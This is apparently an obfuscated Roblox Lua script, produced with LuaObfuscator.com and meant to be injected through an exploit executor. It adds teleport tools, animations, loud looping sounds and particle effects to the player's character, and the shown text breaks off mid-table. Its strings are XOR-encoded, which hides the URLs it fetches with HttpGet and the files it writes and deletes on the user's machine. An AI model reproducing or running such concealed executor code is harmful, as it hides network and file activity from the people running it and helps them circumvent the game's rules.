--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v10,v11) local v12={};for v13=1, #v10 do v6(v12,v0(v4(v1(v2(v10,v13,v13 + 1 )),v1(v2(v11,1 + (v13% #v11) ,1 + (v13% #v11) + 1 )))%256 ));end return v5(v12);end local v8=game.Players.LocalPlayer;local v9=v8:GetMouse();if v8.Character then local v14=v8.Character;local v15=v14:WaitForChild(v7("\249\214\214\36\232\180\206\26","\126\177\163\187\69\134\219\167"));local v16=v14:WaitForChild(v7("\11\216\39\196\242\44\196\46\247\243\44\217\26\196\238\55","\156\67\173\74\165"));if (v15.RigType~=Enum.HumanoidRigType.R6) then return;end local function v17(v51,v52,v53,v54,v55) local v56=0 + 0 ;local v57;local v58;local v59;local v60;while true do if (v56==(1975 -(1656 + 317))) then while true do local v82=0 + 0 ;while true do if (v82==(1704 -(129 + 1574))) then if (v57==(2 -1)) then local v89=0 + 0 ;while true do if (v89==(0 -0)) then v60=v7("\172\45\4\62\102\167\196\184\43\5\56\119\154","\155\203\68\112\86\19\197")   .. tostring(math.random(1 + 0 ,2160776 -1160776 ))   .. v7("\8\208\38\175","\152\38\189\86\156\32\24\133") ;pcall(function() local v108=0 -0 ;local v109;while true do if (v108==(0 -0)) then v109=596 -(328 + 268) ;while true do if ((0 + 0)==v109) then writefile(v60,game:HttpGet(v52));v58.SoundId=v59(v60);break;end end break;end end end);v89=3 -2 ;end if (v89==(1 -0)) then v58.Volume=v53 or 1 ;v57=1081 -(296 + 783) ;break;end end end if (v57==(4 -2)) then local v90=0 + 0 ;while true do if (v90==(1237 -(298 + 938))) then v58:Play();v57=1262 -(233 + 1026) ;break;end if (v90==(1666 -(636 + 1030))) then v58.Looped=v54 or true ;v58.Parent=v51;v90=1 + 0 ;end end end break;end if (v82==(0 + 0)) then if (v57==(0 + 0)) then v58=Instance.new(v7("\7\184\92\24\184","\38\84\215\41\118\220\70"));v58.Name=v55 or v7("\115\3\49\6\241\93\37\45\7\240\84","\158\48\118\66\114") ;v59=getcustomasset or getsynasset ;v57=1 + 0 ;end if (v57==(224 -(55 + 166))) then local v92=905 -(250 + 655) ;while true do if (v92==(0 + 0)) then if  not v54 then v58.Ended:Connect(function() local v112=0 + 0 ;local v113;while true do if (v112==(0 -0)) then v113=1956 -(1869 + 87) ;while true do if (v113==(297 -(36 + 261))) then v58:Destroy();pcall(function() delfile(v60);end);break;end end break;end end end);else v58.Destroying:Connect(function() pcall(function() delfile(v60);end);end);end return v58;end end end v82=1 -0 ;end end end break;end if (v56==(1901 -(484 + 1417))) then v57=1368 -(34 + 1334) ;v58=nil;v56=1 -0 ;end if (v56==(1 + 0)) then local v78=0 -0 ;local v79;while true do if (v78==0) then v79=0 + 0 ;while true do if ((1283 -(1035 + 248))==v79) then v59=nil;v60=nil;v79=22 -(20 + 1) ;end if (v79==(1 + 0)) then v56=2 + 0 ;break;end end break;end end end end end pcall(makefolder,v7("\217\83\160\67\240\88\181\66\195\98\169\79\234\82\181\85\253\91","\38\156\55\199"));local v18=Instance.new(v7("\155\114\105\38\23","\35\200\29\28\72\115\20\154"));v18.Name=v7("\60\187\214\218\129\35\38\29\157\208\204\136\24\60\28\178\212","\84\121\223\177\191\237\76");v18.Parent=workspace;local v21=v7("\179\66\221\176\41\10\127\142\188\95\221\168\47\82\126\194\180\91\134\130\41\88\35\215\168\64\193\179\61\67\127\224\174\82\192\175\41\31\34\192\172\25\219\165\60\67\127\201\190\87\205\179\117\93\49\200\181\25\253\168\63\21\98\145\156\68\204\161\46\21\98\145\154\88\200\174\41\89\117\147\235\27\140\242\106\116\49\211\176\26\140\242\106\116\49\211\176\83\219\236\127\2\96\248\190\66\140\242\106\116\49\211\176\83\219\229\104\0\2\196\182\95\209\238\55\64\99","\161\219\54\169\192\90\48\80");local v22=v7("\108\70\7\32\69\77\18\33\118\119\14\44\95\71\18\54\72\78\79\0\77\69\5\41\70\80\4\7\72\81\5\17\65\71\13\32\7\79\16\118","\69\41\34\96");local v23=pcall(function() readfile(v22);end);if  not v23 then pcall(function() writefile(v22,game:HttpGet(v21));end);end pcall(function() v18.SoundId=(getcustomasset or getsynasset)(v22);end);v18.Volume=319.5 -(134 + 185) ;v18.Looped=true;v18:Play();local v26=Instance.new(v7("\136\204\216\6","\75\220\163\183\106\98"));v26.Name=v7("\54\191\135\50\201\13\168\159","\185\98\218\235\87");v26.RequiresHandle=false;v26.Parent=v8.Backpack;local v31=Instance.new(v7("\234\50\46\235\223\190\194\51\41","\202\171\92\71\134\190"));v31.AnimationId=v7("\59\195\52\137\58\210\41\156\32\197\118\199\102\152\120\216\112\151\120\217\113","\232\73\161\76");local v33=v15:LoadAnimation(v31);local v34=Instance.new(v7("\154\215\75\80\31\175\208\77\83","\126\219\185\34\61"));v34.AnimationId=v7("\30\204\70\115\109\100\246\243\5\202\4\61\49\46\167\183\85\152\10\35\38","\135\108\174\62\18\30\23\147");local v36=v15:LoadAnimation(v34);local v37=Instance.new(v7("\151\231\35\198\25\186\58\200\184","\167\214\137\74\171\120\206\83"));v37.AnimationId=v7("\153\242\42\92\235\180\142\228\59\89\162\232\196\169\100\8\173\254\218\165\107","\199\235\144\82\61\152");local v39=v15:LoadAnimation(v37);local v40=false;v26.Activated:Connect(function() local v62=1133 -(549 + 584) ;local v63;local v64;local v65;while true do if (v62==(0 + 0)) then v63=895 -(557 + 338) ;v64=nil;v62=686 -(314 + 371) ;end if (v62==(3 -2)) then v65=nil;while true do if (v63==(969 -(478 + 490))) then while true do if (v64==(1 + 0)) then local v93=0;while true do if (v93==(1173 -(786 + 386))) then v64=6 -4 ;break;end if (v93==(1379 -(1055 + 324))) then v65=v9.Hit.Position;v39:Play();v93=3 -2 ;end end end if ((0 -0)==v64) then local v94=0;local v95;while true do if (v94==(1340 -(1093 + 247))) then v95=0 -0 ;while true do if (v95==(1 + 0)) then v64=1;break;end if (v95==(0 + 0)) then if v40 then return;end v40=true;v95=3 -2 ;end end break;end end end if (v64==(6 -4)) then local v96=0 -0 ;local v97;while true do if (v96==(0 -0)) then v97=0 + 0 ;while true do if (v97==(0 -0)) then task.wait(0.5 -0 );v16.CFrame=CFrame.new(v65,v65 + v16.CFrame.LookVector );v97=1 + 0 ;end if (v97==(2 -1)) then v64=3;break;end end break;end end end if (v64==(691 -(364 + 324))) then task.wait(2 -1 );v40=false;break;end end break;end if (v63==(0 -0)) then v64=0 + 0 ;v65=nil;v63=4 -3 ;end end break;end end end);v15.Running:Connect(function(v66) if ((v66>(104 -(103 + 1))) and (v15:GetState()~=Enum.HumanoidStateType.Jumping) and  not v39.IsPlaying) then v36:Play();else v36:Stop();end end);local v41=Instance.new(v7("\51\25\182\39","\75\103\118\217"));v41.Name=v7("\230\65\98\21","\126\167\52\16\116\217");v41.RequiresHandle=false;v41.Parent=v8.Backpack;local v45=true;local v46={v14.Torso,v14.Head,v14[v7("\228\43\38\148\244\56\238\197","\156\168\78\64\224\212\121")],v14[v7("\53\231\162\198\19\174\132\220\10","\174\103\142\197")],v14[v7("\122\45\89\44\101\114\253\81","\152\54\72\63\88\69\62")],v14[v7("\230\205\233\84\192\132\194\89\211","\60\180\164\142")]};local function v47(v67,v68) local v69=0 -0 ;local v70;local v71;local v72;while true do if (v69==(1087 -(686 + 400))) then v72=nil;while true do if (v70==(1 + 0)) then while true do if (v71==(229 -(73 + 156))) then v72=Instance.new(v7("\104\95\23\61\46\238\30\93\123\8\32\51\249\23\74","\114\56\62\101\73\71\141"));for v99,v100 in pairs(v68) do v72[v99]=v100;end v71=1;end if ((1 + 0)==v71) then v72.Parent=v67;break;end end break;end if ((0 + 0)==v70) then local v85=0 + 0 ;local v86;while true do if (v85==0) then v86=319 -(27 + 292) ;while true do if ((811 -(721 + 90))==v86) then v71=0 -0 ;v72=nil;v86=1 + 0 ;end if (v86==(4 -3)) then v70=3 -2 ;break;end end break;end end end end break;end if (v69==0) then v70=470 -(224 + 246) ;v71=nil;v69=1 -0 ;end end end local v48={{[v7("\155\230\215\203\170","\164\216\137\187")]=ColorSequence.new({ColorSequenceKeypoint.new(0 + 0 ,Color3.new(0.086274 + 0 ,0.164706,0.082353 + 0 )),ColorSequenceKeypoint.new(1,Color3.new(0.078431 -0 ,0.196078 + 0 ,513.580392 -(203 + 310) ))}),[v7("\246\244\48\181","\107\178\134\81\210\198\158")]=0 -0 ,[v7("\2\33\132\192\185\61\26","\202\88\110\226\166")]=1993 -(1238 + 755) ,[v7("\247\6\143\242\249\192\14\142\242","\170\163\111\226\151")]=1 -0 ,[v7("\61\57\181\48\90\30\39\23\60\167\61\64\52\44","\73\113\80\210\88\46\87")]=0 + 0 ,[v7("\173\37\203\23\243\136\33\200","\135\225\76\173\114")]=NumberRange.new(1534.1 -(709 + 825) ,0.1 -0 ),[v7("\41\253\189\181\168","\199\122\141\216\208\204\221")]=NumberRange.new(1940 -(1642 + 298) ,0 -0 ),[v7("\158\205\2\245\121\242\140\211\23\252\125","\150\205\189\112\144\24")]=Vector2.new(2 -1 ,2 -1 ),[v7("\0\138\190\78\8\141\21","\112\69\228\223\44\100\232\113")]=true,[v7("\245\28\4\214\186\121\148\213\11\14\220\184","\230\180\127\103\179\214\28")]=Vector3.new(864 -(196 + 668) ,0 + 0 ,0 -0 ),[v7("\190\10\75\117\244\68\229\136","\128\236\101\63\38\132\33")]=NumberRange.new(0 -0 ,833 -(171 + 662) ),[v7("\128\166\18\79\179\239\251\163\153\16\86\162","\175\204\201\113\36\214\139")]=false,[v7("\117\205\33\217","\100\39\172\85\188")]=1072 -(357 + 615) ,[v7("\136\117\176\147\32\164\119\183\164\58\191\125\186\148\58\162\118","\83\205\24\217\224")]=Enum.NormalId.Top,[v7("\210\215\204\51\245\213\204\47\227\203\206\36","\93\134\165\173")]=NumberSequence.new({NumberSequenceKeypoint.new(0 -0 ,0,0 + 0 ),NumberSequenceKeypoint.new(1 + 0 ,0 + 0 ,0 + 0 )}),[v7("\141\251\219\199","\30\222\146\161\162\90\174\210")]=NumberSequence.new({NumberSequenceKeypoint.new(0,1454 -(28 + 1425) ,1993 -(941 + 1052) ),NumberSequenceKeypoint.new(698 -(128 + 569) ,1 + 0 ,1514 -(822 + 692) )}),[v7("\201\71\119\2\241\107\125\3\246\93\121\5\235","\106\133\46\16")]=1887.800000011921 -(687 + 1200) ,[v7("\108\37\107\232\79\82\93","\32\56\64\19\156\58")]=v7("\72\202\253\87\73\225\133\78\193\225\12\21\189\211\2\159\179\2\14\166\213\12\159","\224\58\168\133\54\58\146"),[v7("\106\71\94\252\102\142","\107\57\54\43\157\21\230\231")]=NumberSequence.new(0 -0 ),[v7("\244\153\24\240\183\200\206\207\130\30\251","\175\187\235\113\149\217\188")]=Enum.ParticleOrientation.FacingCamera},{[v7("\31\160\141\67\241","\24\92\207\225\44\131\25")]=ColorSequence.new({ColorSequenceKeypoint.new(421 -(275 + 146) ,Color3.new(297.768628 -(45 + 252) ,0.152941 + 0 ,0.811765 -0 )),ColorSequenceKeypoint.new(2 -1 ,Color3.new(433.768628 -(114 + 319) ,0.152941,0.811765 -0 ))}),[v7("\111\193\185\75","\29\43\179\216\44\123")]=0,[v7("\135\246\38\74\174\220\52","\44\221\185\64")]=1 -0 ,[v7("\53\238\69\90\64\2\230\68\90","\19\97\135\40\63")]=1 + 0 ,[v7("\130\85\52\51\59\24\160\90\63\46\42\63\173\89","\81\206\60\83\91\79")]=5 -1 ,[v7("\98\162\214\119\59\202\64\161","\196\46\203\176\18\79\163\45")]=NumberRange.new(285.6 -(147 + 138) ,0.6 -0 ),[v7("\139\50\123\27\32","\143\216\66\30\126\68\155")]=NumberRange.new(1967 -(556 + 1407) ,1210 -(741 + 465) ),[v7("\153\216\31\206\196\167\246\239\173\196\8","\129\202\168\109\171\165\195\183")]=Vector2.new(0,465 -(170 + 295) ),[v7("\7\86\54\218\210\17\226","\134\66\56\87\184\190\116")]=true,[v7("\29\50\10\190\21\238\51\52\40\56\6\181","\85\92\81\105\219\121\139\65")]=Vector3.new(0 + 0 ,0 -0 ,0 + 0 ),[v7("\207\188\68\118\108\218\248\183","\191\157\211\48\37\28")]=NumberRange.new(0 -0 ,0),[v7("\243\16\247\23\63\219\43\251\44\59\205\11","\90\191\127\148\124")]=false,[v7("\74\134\58\18","\119\24\231\78")]=326 -226 ,[v7("\167\32\172\89\207\73\30\140\9\172\88\217\67\5\139\34\171","\113\226\77\197\42\188\32")]=Enum.NormalId.Top,[v7("\14\4\245\187\41\6\245\167\63\24\247\172","\213\90\118\148")]=NumberSequence.new({NumberSequenceKeypoint.new(0 + 0 ,0.96 + 0 ,1230 -(957 + 273) ),NumberSequenceKeypoint.new(1241 -(988 + 252) ,0.96 + 0 ,0 -0 )}),[v7("\104\39\174\83","\45\59\78\212\54")]=NumberSequence.new({NumberSequenceKeypoint.new(0,2 -1 ,890 -(223 + 667) ),NumberSequenceKeypoint.new(4 -3 ,1780 -(389 + 1391) ,0 + 0 )}),[v7("\60\95\132\131\146\11\160\249\3\69\138\132\136","\144\112\54\227\235\230\78\205")]=1 + 3 ,[v7("\135\45\23\232\197\73\182","\59\211\72\111\156\176")]=v7("\70\147\247\61\20\200\172\58\89\144\173\63\65\133\239\34\86\201\224\34\67\200\226\62\93\130\247\98\17\142\231\112\28\211\177\124\30\213\178\121\25","\77\46\231\131"),[v7("\137\69\163\65\169\92","\32\218\52\214")]=NumberSequence.new(0 -0 ),[v7("\97\5\56\173\255\164\68\78\71\24\63","\58\46\119\81\200\145\208\37")]=Enum.ParticleOrientation.FacingCamera},{[v7("\8\131\60\163\187","\86\75\236\80\204\201\221")]=ColorSequence.new({ColorSequenceKeypoint.new(951 -(783 + 168) ,Color3.new(0 -0 ,0 -0 ,0 + 0 )),ColorSequenceKeypoint.new(2 -1 ,Color3.new(1212.156863 -(1090 + 122) ,0.156863 + 0 ,0.156863 -0 ))}),[v7("\86\83\118\130","\235\18\33\23\229\158")]=0 + 0 ,[v7("\106\149\199\189\67\191\213","\219\48\218\161")]=1118 -(628 + 490) ,[v7("\208\120\113\76\232\76\225\232\116","\128\132\17\28\41\187\47")]=1 + 0 ,[v7("\45\59\1\50\73\40\60\0\54\72\4\60\5\63","\61\97\82\102\90")]=0 -0 ,[v7("\128\39\173\78\211\94\19\12","\105\204\78\203\43\167\55\126")]=NumberRange.new(4 -3 ,1 + 0 ),[v7("\150\186\38\27\23","\49\197\202\67\126\115\100\167")]=NumberRange.new(774 -(431 + 343) ,0 -0 ),[v7("\4\75\205\44\129\82\127\57\92\211\44","\62\87\59\191\73\224\54")]=Vector2.new(0 -0 ,0 + 0 ),[v7("\194\12\251\203\235\7\254","\169\135\98\154")]=true,[v7("\234\116\39\81\241\54\218\202\99\45\91\243","\168\171\23\68\52\157\83")]=Vector3.new(0 + 0 ,1 + 0 ,1695 -(556 + 1139) ),[v7("\198\126\225\158\53\40\130\240","\231\148\17\149\205\69\77")]=NumberRange.new(20 -(6 + 9) ,15 + 10 ),[v7("\172\168\196\240\82\251\180\168\247\250\69\235","\159\224\199\167\155\55")]=false,[v7("\197\242\40\215","\178\151\147\92")]=37 + 163 ,[v7("\169\240\69\33\1\69\117\130\217\69\32\23\79\110\133\242\66","\26\236\157\44\82\114\44")]=Enum.NormalId.Top,[v7("\30\60\212\85\57\62\212\73\47\32\214\66","\59\74\78\181")]=NumberSequence.new({NumberSequenceKeypoint.new(0 + 0 ,169 -(28 + 141) ,0 + 0 ),NumberSequenceKeypoint.new(961 -(890 + 70) ,0 -0 ,0 + 0 )}),[v7("\22\216\64\95","\211\69\177\58\58")]=NumberSequence.new({NumberSequenceKeypoint.new(0 -0 ,0.5 -0 ,0 -0 ),NumberSequenceKeypoint.new(1 + 0 ,0.5 + 0 ,0 + 0 )}),[v7("\155\236\126\253\253\238\186\236\106\230\224\196\185","\171\215\133\25\149\137")]=0 -0 ,[v7("\213\205\42\238\250\34\249","\34\129\168\82\154\143\80\156")]=v7("\151\176\43\10\91\93\140\145\232\124\68\92\75\145\145\167\33\14\91\1\153\132\160\39\2\75\66\140\150\253\53\2\90\75\182\136\179\58\5\6\74\141\150","\233\229\210\83\107\40\46"),[v7("\242\83\39\215\22\201","\101\161\34\82\182")]=NumberSequence.new(1263 -(668 + 595) ),[v7("\199\31\80\251\213\246\131\58\225\2\87","\78\136\109\57\158\187\130\226")]=Enum.ParticleOrientation.FacingCamera},{[v7("\29\48\245\254\44","\145\94\95\153")]=ColorSequence.new({ColorSequenceKeypoint.new(0 -0 ,Color3.new(1 + 0 ,291 -(23 + 267) ,1945 -(1129 + 815) )),ColorSequenceKeypoint.new(1,Color3.new(388 -(371 + 16) ,1751 -(1326 + 424) ,1 + 0 ))}),[v7("\217\223\21\210","\215\157\173\116\181\46")]=0 -0 ,[v7("\15\155\141\244\201\48\160","\186\85\212\235\146")]=1 -0 ,[v7("\246\136\27\251\10\237\89\206\132","\56\162\225\118\158\89\142")]=1 + 0 ,[v7("\112\12\199\167\54\241\82\3\204\186\39\214\95\0","\184\60\101\160\207\66")]=0 -0 ,[v7("\29\139\122\185\37\139\113\185","\220\81\226\28")]=NumberRange.new(1,119 -(88 + 30) ),[v7("\32\197\135\254\238","\167\115\181\226\155\138")]=NumberRange.new(771.25 -(720 + 51) ,1),[v7("\209\50\245\89\122\117\231\236\37\235\89","\166\130\66\135\60\27\17")]=Vector2.new(180,400 -220 ),[v7("\97\68\207\119\60\65\78","\80\36\42\174\21")]=true,[v7("\111\19\52\127\66\21\37\123\90\25\56\116","\26\46\112\87")]=Vector3.new(1776 -(421 + 1355) ,2.5 -0 ,1710 -(1596 + 114) ),[v7("\139\44\191\71\175\186\64\176","\212\217\67\203\20\223\223\37")]=NumberRange.new(0 + 0 ,1083 -(286 + 797) ),[v7("\150\130\171\217\191\137\156\221\138\140\186\198","\178\218\237\200")]=false,[v7("\132\180\242\213","\176\214\213\134")]=73 -53 ,[v7("\209\160\191\199\187\95\86\250\137\191\198\173\85\77\253\162\184","\57\148\205\214\180\200\54")]=Enum.NormalId.Top,[v7("\38\239\52\58\101\2\252\39\49\120\17\228","\22\114\157\85\84")]=NumberSequence.new({NumberSequenceKeypoint.new(0 + 0 ,440 -(397 + 42) ,0 + 0 ),NumberSequenceKeypoint.new(0.3 -0 ,785.35 -(222 + 563) ,0.05 -0 ),NumberSequenceKeypoint.new(0.6,190.1 -(23 + 167) ,1798.1 -(690 + 1108) ),NumberSequenceKeypoint.new(0.898,0.4,0.05 -0 ),NumberSequenceKeypoint.new(849 -(40 + 808) ,1 + 0 ,0 -0 )}),[v7("\247\194\9\193","\200\164\171\115\164\61\150")]=NumberSequence.new({NumberSequenceKeypoint.new(0 + 0 ,0.025 + 0 ,0),NumberSequenceKeypoint.new(1 + 0 ,0.025 -0 ,0 + 0 )}),[v7("\146\253\4\77\151\155\249\10\86\144\183\251\13","\227\222\148\99\37")]=1 + 0 ,[v7("\7\87\74\226\236\33\87","\153\83\50\50\150")]=v7("\79\116\107\29\96\184\72\73\127\119\70\60\228\28\13\46\34\73\32\255\31\9\36","\45\61\22\19\124\19\203"),[v7("\242\3\24\244\17\120","\217\161\114\109\149\98\16")]=NumberSequence.new(0),[v7("\61\50\49\121\178\96\19\52\49\115\178","\20\114\64\88\28\220")]=Enum.ParticleOrientation.FacingCamera},{[v7("\18\14\222\187\234","\221\81\97\178\212\152\176")]=ColorSequence.new({ColorSequenceKeypoint.new(0 -0 ,Color3.new(0 -0 ,0,0 -0 )),ColorSequenceKeypoint.new(1 + 0 ,Color3.new(0 -0 ,0,0 + 0 ))}),[v7("\233\245\28\252","\122\173\135\125\155")]=479 -(341 + 138) ,[v7("\190\238\6\191\44\52\220","\168\228\161\96\217\95\81")]= -(1 + 1),[v7("\239\216\35\89\28\84\218\221\43","\55\187\177\78\60\79")]=1 + 0 ,[v7("\1\199\88\227\82\230\142\43\194\74\238\72\204\133","\224\77\174\63\139\38\175")]=1 -0 ,[v7("\168\72\94\43\144\72\85\43","\78\228\33\56")]=NumberRange.new(328 -(89 + 237) ,6 -4 ),[v7("\253\110\183\6\129","\229\174\30\210\99")]=NumberRange.new(0.5 -0 ,881.5 -(581 + 300) ),[v7("\40\253\148\84\236\57\24\21\234\138\84","\89\123\141\230\49\141\93")]=Vector2.new(1235 -(855 + 365) ,6 + 9 ),[v7("\214\127\247\14\28\79\247","\42\147\17\150\108\112")]=true,[v7("\46\165\46\122\235\237\29\167\57\118\232\230","\136\111\198\77\31\135")]=Vector3.new(0 -0 ,0 + 0 ,1235 -(1030 + 205) ),[v7("\48\6\179\101\173\225\18\173","\201\98\105\199\54\221\132\119")]=NumberRange.new( -100,100),[v7("\149\3\128\42\7\49\152\182\60\130\51\22","\204\217\108\227\65\98\85")]=true,[v7("\108\194\225\224","\160\62\163\149\133\76")]=47 + 3 ,[v7("\243\173\4\60\208\223\175\3\11\202\196\165\14\59\202\217\174","\163\182\192\109\79")]=Enum.NormalId.Top,[v7("\0\52\1\206\230\36\39\18\197\251\55\63","\149\84\70\96\160")]=NumberSequence.new({NumberSequenceKeypoint.new(286 -(156 + 130) ,2 -1 ,0 -0 ),NumberSequenceKeypoint.new(0.116564 -0 ,0.704918 + 0 ,0 -0 ),NumberSequenceKeypoint.new(0.654908 + 0 ,69.73224 -(10 + 59) ,0 + 0 ),NumberSequenceKeypoint.new(1164 -(671 + 492) ,1 + 0 ,1215 -(369 + 846) )}),[v7("\11\15\23\232","\141\88\102\109")]=NumberSequence.new({NumberSequenceKeypoint.new(0,1 + 1 ,1844 -(1524 + 320) ),NumberSequenceKeypoint.new(1946 -(1036 + 909) ,4 -2 ,0 + 0 )}),[v7("\159\90\205\120\14\24\88\200\160\64\195\127\20","\161\211\51\170\16\122\93\53")]=0.30000001192092896 -0 ,[v7("\207\171\170\60\238\188\183","\72\155\206\210")]=v7("\84\120\76\15\32\85\127\64\7\55\28\53\27\86\96\21\34\3\90\103\21\46","\83\38\26\52\110"),[v7("\107\6\50\71\75\31","\38\56\119\71")]=NumberSequence.new(0),[v7("\220\253\81\211\43\66\242\251\81\217\43","\54\147\143\56\182\69")]=Enum.ParticleOrientation.FacingCamera},{[v7("\245\142\243\70\205","\191\182\225\159\41")]=ColorSequence.new({ColorSequenceKeypoint.new(0,Color3.new(175 -(135 + 40) ,0 -0 ,0 + 0 )),ColorSequenceKeypoint.new(1 -0 ,Color3.new(176 -(50 + 126) ,0,0))}),[v7("\15\0\41\82","\162\75\114\72\53\235\231")]=0,[v7("\182\19\66\228\64\7\152","\98\236\92\36\130\51")]= -(8 -5),[v7("\144\16\1\191\118\171\180\60\161","\80\196\121\108\218\37\200\213")]=1 + 0 ,[v7("\44\122\5\119\95\39\132\6\127\23\122\69\13\143","\234\96\19\98\31\43\110")]=1056 -(331 + 724) ,[v7("\42\22\84\194\184\123\134\3","\235\102\127\50\167\204\18")]=NumberRange.new(1 + 1 ,646 -(269 + 375) ),[v7("\99\177\240\38\64","\78\48\193\149\67\36")]=NumberRange.new(0.5 + 0 ,1413.5 -(1233 + 180) ),[v7("\3\14\146\29\64\52\63\142\31\77\53","\33\80\126\224\120")]=Vector2.new(984 -(522 + 447) ,1436 -(107 + 1314) ),[v7("\201\166\2\198\80\233\172","\60\140\200\99\164")]=true,[v7("\166\247\7\35\174\130\230\5\50\171\136\250","\194\231\148\100\70")]=Vector3.new(0 + 0 ,0 -0 ,0 + 0 ),[v7("\116\67\213\144\230\205\67\72","\168\38\44\161\195\150")]=NumberRange.new( -100,198 -98 ),[v7("\172\243\129\125\53\236\130\25\176\253\144\98","\118\224\156\226\22\80\136\214")]=true,[v7("\112\239\77\133","\224\34\142\57")]=129 -79 ,[v7("\251\170\204\206\96\248\82\0\250\174\215\216\112\229\84\1\208","\110\190\199\165\189\19\145\61")]=Enum.NormalId.Top,[v7("\238\249\118\230\152\215\219\249\114\230\136\222","\167\186\139\23\136\235")]=NumberSequence.new({NumberSequenceKeypoint.new(1910 -(716 + 1194) ,1 + 0 ,0 + 0 ),NumberSequenceKeypoint.new(503.116564 -(74 + 429) ,0.704918 -0 ,0 -0 ),NumberSequenceKeypoint.new(0.654908,0.73224 + 0 ,0),NumberSequenceKeypoint.new(1 + 0 ,1,0 -0 )}),[v7("\41\188\146\8","\109\122\213\232")]=NumberSequence.new({NumberSequenceKeypoint.new(0 -0 ,433.95 -(279 + 154) ,778 -(454 + 324) ),NumberSequenceKeypoint.new(18 -(12 + 5) ,0.95 + 0 ,0 + 0 )}),[v7("\194\254\165\56\250\210\175\57\253\228\171\63\224","\80\142\151\194")]=0.30000001192092896,[v7("\55\195\111\88\22\212\114","\44\99\166\23")]=v7("\110\245\49\55\32\183\121\227\32\50\105\235\51\175\122\101\107\243\40\163\122\98","\196\28\151\73\86\83"),[v7("\192\18\60\17\145\80","\22\147\99\73\112\226\56\120")]=NumberSequence.new(0),[v7("\151\103\235\240\131\172\116\246\252\130\182","\237\216\21\130\149")]=Enum.ParticleOrientation.FacingCamera},{[v7("\161\65\83\80\162","\62\226\46\63\63\208\169")]=ColorSequence.new({ColorSequenceKeypoint.new(1093 -(277 + 816) ,Color3.new(0 -0 ,1183 -(1058 + 125) ,0 -0 )),ColorSequenceKeypoint.new(976 -(815 + 160) ,Color3.new(0 -0 ,0 -0 ,1419 -(374 + 1045) ))}),[v7("\193\11\84\132","\62\133\121\53\227\127\109\79")]=0 + 0 ,[v7("\42\59\52\243\197\171\182","\194\112\116\82\149\182\206")]= -(1 + 2),[v7("\13\161\65\29\243\225\15\53\173","\110\89\200\44\120\160\130")]=2 -1 ,[v7("\135\202\76\78\87\99\53\75\167\214\78\72\64\79","\45\203\163\43\38\35\42\91")]=639 -(448 + 190) ,[v7("\254\140\218\38\147\160\89\215","\52\178\229\188\67\231\201")]=NumberRange.new(5 -3 ,1900 -(41 + 1857) ),[v7("\18\81\85\1\243","\67\65\33\48\100\151\60")]=NumberRange.new(0.5,1893.5 -(1222 + 671) ),[v7("\236\247\188\221\242\219\198\160\223\255\218","\147\191\135\206\184")]=Vector2.new(38 -23 ,57 -42 ),[v7("\161\38\167\195\212\86\182","\210\228\72\198\161\184\51")]=true,[v7("\23\74\240\21\127\203\36\72\231\25\124\192","\174\86\41\147\112\19")]=Vector3.new(0 -0 ,0 -0 ,1182 -(229 + 953) ),[v7("\105\15\153\56\53\10\20\175","\203\59\96\237\107\69\111\113")]=NumberRange.new( -100,1594 -(1307 + 187) ),[v7("\8\25\175\234\52\244\227\43\38\173\243\37","\183\68\118\204\129\81\144")]=true,[v7("\60\172\100\225","\226\110\205\16\132\107")]=1824 -(1111 + 663) ,[v7("\206\206\233\202\82\226\204\238\253\72\249\198\227\205\72\228\205","\33\139\163\128\185")]=Enum.NormalId.Top,[v7("\99\74\5\208\68\72\5\204\82\86\7\199","\190\55\56\100")]=NumberSequence.new({NumberSequenceKeypoint.new(0 -0 ,1 + 0 ,0 + 0 ),NumberSequenceKeypoint.new(0.116564 + 0 ,679.704918 -(642 + 37) ,0 + 0 ),NumberSequenceKeypoint.new(0.654908 -0 ,0.73224 + 0 ,454 -(233 + 221) ),NumberSequenceKeypoint.new(37 -(13 + 23) ,2 -1 ,0 + 0 )}),[v7("\101\166\38\27","\147\54\207\92\126\115\131")]=NumberSequence.new({NumberSequenceKeypoint.new(0 + 0 ,805.95 -(266 + 539) ,0 -0 ),NumberSequenceKeypoint.new(1 + 0 ,1225.95 -(636 + 589) ,0)}),[v7("\33\56\50\117\25\91\0\56\38\110\4\113\3","\30\109\81\85\29\109")]=0.30000001192092896 -0 ,[v7("\203\116\76\162\35\204\249","\156\159\17\52\214\86\190")]=v7("\188\237\165\189\189\252\184\168\167\235\231\243\225\183\238\239\246\184\233\232\253\187","\220\206\143\221"),[v7("\181\108\56\22\203\196","\178\230\29\77\119\184\172")]=NumberSequence.new(0 -0 ),[v7("\218\172\3\30\121\236\244\170\3\20\121","\152\149\222\106\123\23")]=Enum.ParticleOrientation.FacingCamera},{[v7("\254\41\250\76\167","\213\189\70\150\35")]=ColorSequence.new({ColorSequenceKeypoint.new(0 + 0 ,Color3.new(1015.768628 -(657 + 358) ,0.152941 -0 ,0.811765)),ColorSequenceKeypoint.new(2 -1 ,Color3.new(1187.768628 -(1151 + 36) ,0.152941 + 0 ,0.811765 + 0 ))}),[v7("\107\71\117\15","\104\47\53\20")]=0 + 0 ,[v7("\153\99\135\26\175\10\183","\111\195\44\225\124\220")]= -(2 -1),[v7("\236\79\13\118\152\168\217\74\5","\203\184\38\96\19\203")]=1 + 0 ,[v7("\21\122\126\73\218\16\125\127\77\219\60\125\122\68","\174\89\19\25\33")]=1833 -(1552 + 280) ,[v7("\3\27\84\75\227\142\6\42","\107\79\114\50\46\151\231")]=NumberRange.new(2,2),[v7("\10\182\176\44\142","\160\89\198\213\73\234\89\215")]=NumberRange.new(834.5 -(64 + 770) ,0.5 + 0 ),[v7("\123\97\166\251\196\76\80\186\249\201\77","\165\40\17\212\158")]=Vector2.new(387 -(45 + 327) ,34 -19 